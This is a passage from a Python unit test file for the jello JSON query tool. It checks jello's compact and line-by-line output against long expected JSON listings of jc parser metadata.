Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsblk"]},{"name":"lsmod","argument":"--lsmod","version":"1.1","description":"lsmod command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsmod"]},{"name":"lsof","argument":"--lsof","version":"1.0","description":"lsof command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsof"]},{"name":"mount","argument":"--mount","version":"1.1","description":"mount command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["mount"]},{"name":"netstat","argument":"--netstat","version":"1.2","description":"netstat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["netstat"]},{"name":"ntpq","argument":"--ntpq","version":"1.0","description":"ntpq -p command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ntpq"]},{"name":"passwd","argument":"--passwd","version":"1.0","description":"/etc/passwd file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"pip_list","argument":"--pip-list","version":"1.0","description":"pip list command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip list","pip3 list"]},{"name":"pip_show","argument":"--pip-show","version":"1.0","description":"pip show command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip show","pip3 show"]},{"name":"ps","argument":"--ps","version":"1.1","description":"ps command 
parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ps"]},{"name":"route","argument":"--route","version":"1.0","description":"route command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["route"]},{"name":"shadow","argument":"--shadow","version":"1.0","description":"/etc/shadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"ss","argument":"--ss","version":"1.0","description":"ss command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ss"]},{"name":"stat","argument":"--stat","version":"1.0","description":"stat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["stat"]},{"name":"systemctl","argument":"--systemctl","version":"1.0","description":"systemctl command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl"]},{"name":"systemctl_lj","argument":"--systemctl-lj","version":"1.0","description":"systemctl list-jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-jobs"]},{"name":"systemctl_ls","argument":"--systemctl-ls","version":"1.0","description":"systemctl list-sockets command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-sockets"]},{"name":"systemctl_luf","argument":"--systemctl-luf","version":"1.0","description":"systemctl list-unit-files command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl 
list-unit-files"]},{"name":"timedatectl","argument":"--timedatectl","version":"1.0","description":"timedatectl status command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["timedatectl","timedatectl status"]},{"name":"uname","argument":"--uname","version":"1.1","description":"uname -a command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["uname"]},{"name":"uptime","argument":"--uptime","version":"1.0","description":"uptime command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["uptime"]},{"name":"w","argument":"--w","version":"1.0","description":"w command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["w"]},{"name":"who","argument":"--who","version":"1.0","description":"who command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["who"]},{"name":"xml","argument":"--xml","version":"1.0","description":"XML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the xmltodict library at https://github.com/martinblech/xmltodict","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"yaml","argument":"--yaml","version":"1.0","description":"YAML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}]
'''
    # Capture jello's stdout while faking the command line, then compare
    # the full captured text against the expected literal above.
    buf = io.StringIO()
    cli_args = ['jello', '-c', '_["parsers"]']
    with contextlib.redirect_stdout(buf), patch.object(sys, 'argv', cli_args):
        _ = jello.cli.main(data=self.jc_a_output)
    self.assertEqual(buf.getvalue(), self.expected)
def test_jc_a_c_parsers_dot(self):
    """
    Test jc -a | jello -c _.parsers
    """
    # Expected compact (-c) output; identical to the bracket-notation test,
    # since _.parsers and _["parsers"] select the same data.
    self.expected = '''[{"name":"airport","argument":"--airport","version":"1.0","description":"airport -I command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -I"]},{"name":"airport_s","argument":"--airport-s","version":"1.0","description":"airport -s command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -s"]},{"name":"arp","argument":"--arp","version":"1.2","description":"arp command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["arp"]},{"name":"blkid","argument":"--blkid","version":"1.0","description":"blkid command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["blkid"]},{"name":"crontab","argument":"--crontab","version":"1.1","description":"crontab command and file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["crontab"]},{"name":"crontab_u","argument":"--crontab-u","version":"1.0","description":"crontab file parser with user support","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"csv","argument":"--csv","version":"1.0","description":"CSV file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the python standard csv library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"df","argument":"--df","version":"1.1","description":"df command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["df"]},{"name":"dig","argument":"--dig","version":"1.1","description":"dig command parser","author":"Kelly 
Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["dig"]},{"name":"du","argument":"--du","version":"1.1","description":"du command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["du"]},{"name":"env","argument":"--env","version":"1.1","description":"env command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["env"]},{"name":"file","argument":"--file","version":"1.1","description":"file command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["file"]},{"name":"free","argument":"--free","version":"1.0","description":"free command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["free"]},{"name":"fstab","argument":"--fstab","version":"1.0","description":"fstab file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"]},{"name":"group","argument":"--group","version":"1.0","description":"/etc/group file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"gshadow","argument":"--gshadow","version":"1.0","description":"/etc/gshadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd"]},{"name":"history","argument":"--history","version":"1.2","description":"history command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Optimizations by https://github.com/philippeitis","compatible":["linux","darwin","cygwin","aix","freebsd"]},{"name":"hosts","argument":"--hosts","version":"1.0","description":"/etc/hosts file parser","author":"Kelly 
Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"id","argument":"--id","version":"1.0","description":"id command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["id"]},{"name":"ifconfig","argument":"--ifconfig","version":"1.5","description":"ifconfig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["ifconfig"]},{"name":"ini","argument":"--ini","version":"1.0","description":"INI file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using configparser from the standard library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"iptables","argument":"--iptables","version":"1.1","description":"iptables command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["iptables"]},{"name":"jobs","argument":"--jobs","version":"1.0","description":"jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["jobs"]},{"name":"last","argument":"--last","version":"1.0","description":"last and lastb command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["last","lastb"]},{"name":"ls","argument":"--ls","version":"1.3","description":"ls command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ls"]},{"name":"lsblk","argument":"--lsblk","version":"1.3","description":"lsblk command parser","author":"Kelly 
Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsblk"]},{"name":"lsmod","argument":"--lsmod","version":"1.1","description":"lsmod command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsmod"]},{"name":"lsof","argument":"--lsof","version":"1.0","description":"lsof command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsof"]},{"name":"mount","argument":"--mount","version":"1.1","description":"mount command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["mount"]},{"name":"netstat","argument":"--netstat","version":"1.2","description":"netstat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["netstat"]},{"name":"ntpq","argument":"--ntpq","version":"1.0","description":"ntpq -p command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ntpq"]},{"name":"passwd","argument":"--passwd","version":"1.0","description":"/etc/passwd file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"pip_list","argument":"--pip-list","version":"1.0","description":"pip list command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip list","pip3 list"]},{"name":"pip_show","argument":"--pip-show","version":"1.0","description":"pip show command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip show","pip3 show"]},{"name":"ps","argument":"--ps","version":"1.1","description":"ps command 
parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ps"]},{"name":"route","argument":"--route","version":"1.0","description":"route command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["route"]},{"name":"shadow","argument":"--shadow","version":"1.0","description":"/etc/shadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"ss","argument":"--ss","version":"1.0","description":"ss command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ss"]},{"name":"stat","argument":"--stat","version":"1.0","description":"stat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["stat"]},{"name":"systemctl","argument":"--systemctl","version":"1.0","description":"systemctl command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl"]},{"name":"systemctl_lj","argument":"--systemctl-lj","version":"1.0","description":"systemctl list-jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-jobs"]},{"name":"systemctl_ls","argument":"--systemctl-ls","version":"1.0","description":"systemctl list-sockets command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-sockets"]},{"name":"systemctl_luf","argument":"--systemctl-luf","version":"1.0","description":"systemctl list-unit-files command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl 
list-unit-files"]},{"name":"timedatectl","argument":"--timedatectl","version":"1.0","description":"timedatectl status command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["timedatectl","timedatectl status"]},{"name":"uname","argument":"--uname","version":"1.1","description":"uname -a command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["uname"]},{"name":"uptime","argument":"--uptime","version":"1.0","description":"uptime command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["uptime"]},{"name":"w","argument":"--w","version":"1.0","description":"w command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["w"]},{"name":"who","argument":"--who","version":"1.0","description":"who command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["who"]},{"name":"xml","argument":"--xml","version":"1.0","description":"XML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the xmltodict library at https://github.com/martinblech/xmltodict","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"yaml","argument":"--yaml","version":"1.0","description":"YAML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}]
'''
    # Fake the argv first, then capture stdout (nesting order of the two
    # context managers is interchangeable) and run the CLI entry point.
    argv_override = ['jello', '-c', '_.parsers']
    output = io.StringIO()
    with patch.object(sys, 'argv', argv_override):
        with contextlib.redirect_stdout(output):
            _ = jello.cli.main(data=self.jc_a_output)
    self.assertEqual(output.getvalue(), self.expected)
def test_jc_a_l_parsers(self):
    """
    Test jc -a | jello -l '_["parsers"]'
    """
    # Lines (-l) output: one compact JSON object per line, in parser order.
    # The backslash after ''' suppresses the leading newline.
    self.expected = '''\
{"name":"airport","argument":"--airport","version":"1.0","description":"airport -I command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -I"]}
{"name":"airport_s","argument":"--airport-s","version":"1.0","description":"airport -s command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -s"]}
{"name":"arp","argument":"--arp","version":"1.2","description":"arp command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["arp"]}
{"name":"blkid","argument":"--blkid","version":"1.0","description":"blkid command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["blkid"]}
{"name":"crontab","argument":"--crontab","version":"1.1","description":"crontab command and file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["crontab"]}
{"name":"crontab_u","argument":"--crontab-u","version":"1.0","description":"crontab file parser with user support","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"csv","argument":"--csv","version":"1.0","description":"CSV file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the python standard csv library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"df","argument":"--df","version":"1.1","description":"df command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["df"]}
{"name":"dig","argument":"--dig","version":"1.1","description":"dig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["dig"]}
{"name":"du","argument":"--du","version":"1.1","description":"du command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["du"]}
{"name":"env","argument":"--env","version":"1.1","description":"env command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["env"]}
{"name":"file","argument":"--file","version":"1.1","description":"file command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["file"]}
{"name":"free","argument":"--free","version":"1.0","description":"free command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["free"]}
{"name":"fstab","argument":"--fstab","version":"1.0","description":"fstab file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"]}
{"name":"group","argument":"--group","version":"1.0","description":"/etc/group file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"gshadow","argument":"--gshadow","version":"1.0","description":"/etc/gshadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd"]}
{"name":"history","argument":"--history","version":"1.2","description":"history command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Optimizations by https://github.com/philippeitis","compatible":["linux","darwin","cygwin","aix","freebsd"]}
{"name":"hosts","argument":"--hosts","version":"1.0","description":"/etc/hosts file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"id","argument":"--id","version":"1.0","description":"id command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["id"]}
{"name":"ifconfig","argument":"--ifconfig","version":"1.5","description":"ifconfig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["ifconfig"]}
{"name":"ini","argument":"--ini","version":"1.0","description":"INI file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using configparser from the standard library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"iptables","argument":"--iptables","version":"1.1","description":"iptables command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["iptables"]}
{"name":"jobs","argument":"--jobs","version":"1.0","description":"jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["jobs"]}
{"name":"last","argument":"--last","version":"1.0","description":"last and lastb command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["last","lastb"]}
{"name":"ls","argument":"--ls","version":"1.3","description":"ls command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ls"]}
{"name":"lsblk","argument":"--lsblk","version":"1.3","description":"lsblk command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsblk"]}
{"name":"lsmod","argument":"--lsmod","version":"1.1","description":"lsmod command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsmod"]}
{"name":"lsof","argument":"--lsof","version":"1.0","description":"lsof command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsof"]}
{"name":"mount","argument":"--mount","version":"1.1","description":"mount command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["mount"]}
{"name":"netstat","argument":"--netstat","version":"1.2","description":"netstat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["netstat"]}
{"name":"ntpq","argument":"--ntpq","version":"1.0","description":"ntpq -p command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ntpq"]}
{"name":"passwd","argument":"--passwd","version":"1.0","description":"/etc/passwd file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"pip_list","argument":"--pip-list","version":"1.0","description":"pip list command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip list","pip3 list"]}
{"name":"pip_show","argument":"--pip-show","version":"1.0","description":"pip show command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip show","pip3 show"]}
{"name":"ps","argument":"--ps","version":"1.1","description":"ps command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ps"]}
{"name":"route","argument":"--route","version":"1.0","description":"route command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["route"]}
{"name":"shadow","argument":"--shadow","version":"1.0","description":"/etc/shadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"ss","argument":"--ss","version":"1.0","description":"ss command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ss"]}
{"name":"stat","argument":"--stat","version":"1.0","description":"stat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["stat"]}
{"name":"systemctl","argument":"--systemctl","version":"1.0","description":"systemctl command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl"]}
{"name":"systemctl_lj","argument":"--systemctl-lj","version":"1.0","description":"systemctl list-jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-jobs"]}
{"name":"systemctl_ls","argument":"--systemctl-ls","version":"1.0","description":"systemctl list-sockets command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-sockets"]}
{"name":"systemctl_luf","argument":"--systemctl-luf","version":"1.0","description":"systemctl list-unit-files command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-unit-files"]}
{"name":"timedatectl","argument":"--timedatectl","version":"1.0","description":"timedatectl status command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["timedatectl","timedatectl status"]}
{"name":"uname","argument":"--uname","version":"1.1","description":"uname -a command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["uname"]}
{"name":"uptime","argument":"--uptime","version":"1.0","description":"uptime command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["uptime"]}
{"name":"w","argument":"--w","version":"1.0","description":"w command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["w"]}
{"name":"who","argument":"--who","version":"1.0","description":"who command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["who"]}
{"name":"xml","argument":"--xml","version":"1.0","description":"XML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the xmltodict library at https://github.com/martinblech/xmltodict","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"yaml","argument":"--yaml","version":"1.0","description":"YAML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
'''
    # Run the CLI with a faked argv while capturing everything it prints.
    captured = io.StringIO()
    with contextlib.redirect_stdout(captured):
        with patch.object(sys, 'argv', ['jello', '-l', '_["parsers"]']):
            _ = jello.cli.main(data=self.jc_a_output)
    self.assertEqual(captured.getvalue(), self.expected)
def test_jc_a_l_parsers_dot(self):
"""
Test jc -a | jello -l _.parsers
"""
self.expected = '''\
{"name":"airport","argument":"--airport","version":"1.0","description":"airport -I command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -I"]}
{"name":"airport_s","argument":"--airport-s","version":"1.0","description":"airport -s command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -s"]}
{"name":"arp","argument":"--arp","version":"1.2","description":"arp command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["arp"]}
{"name":"blkid","argument":"--blkid","version":"1.0","description":"blkid command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["blkid"]}
{"name":"crontab","argument":"--crontab","version":"1.1","description":"crontab command and file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["crontab"]}
{"name":"crontab_u","argument":"--crontab-u","version":"1.0","description":"crontab file parser with user support","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"csv","argument":"--csv","version":"1.0","description":"CSV file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the python standard csv library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"df","argument":"--df","version":"1.1","description":"df command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["df"]}
{"name":"dig","argument":"--dig","version":"1.1","description":"dig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["dig"]}
{"name":"du","argument":"--du","version":"1.1","description":"du command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["du"]}
{"name":"env","argument":"--env","version":"1.1","description":"env command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["env"]}
{"name":"file","argument":"--file","version":"1.1","description":"file command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["file"]}
{"name":"free","argument":"--free","version":"1.0","description":"free command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["free"]}
{"name":"fstab","argument":"--fstab","version":"1.0","description":"fstab file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"]}
{"name":"group","argument":"--group","version":"1.0","description":"/etc/group file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"gshadow","argument":"--gshadow","version":"1.0","description":"/etc/gshadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd"]}
{"name":"history","argument":"--history","version":"1.2","description":"history command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Optimizations by https://github.com/philippeitis","compatible":["linux","darwin","cygwin","aix","freebsd"]}
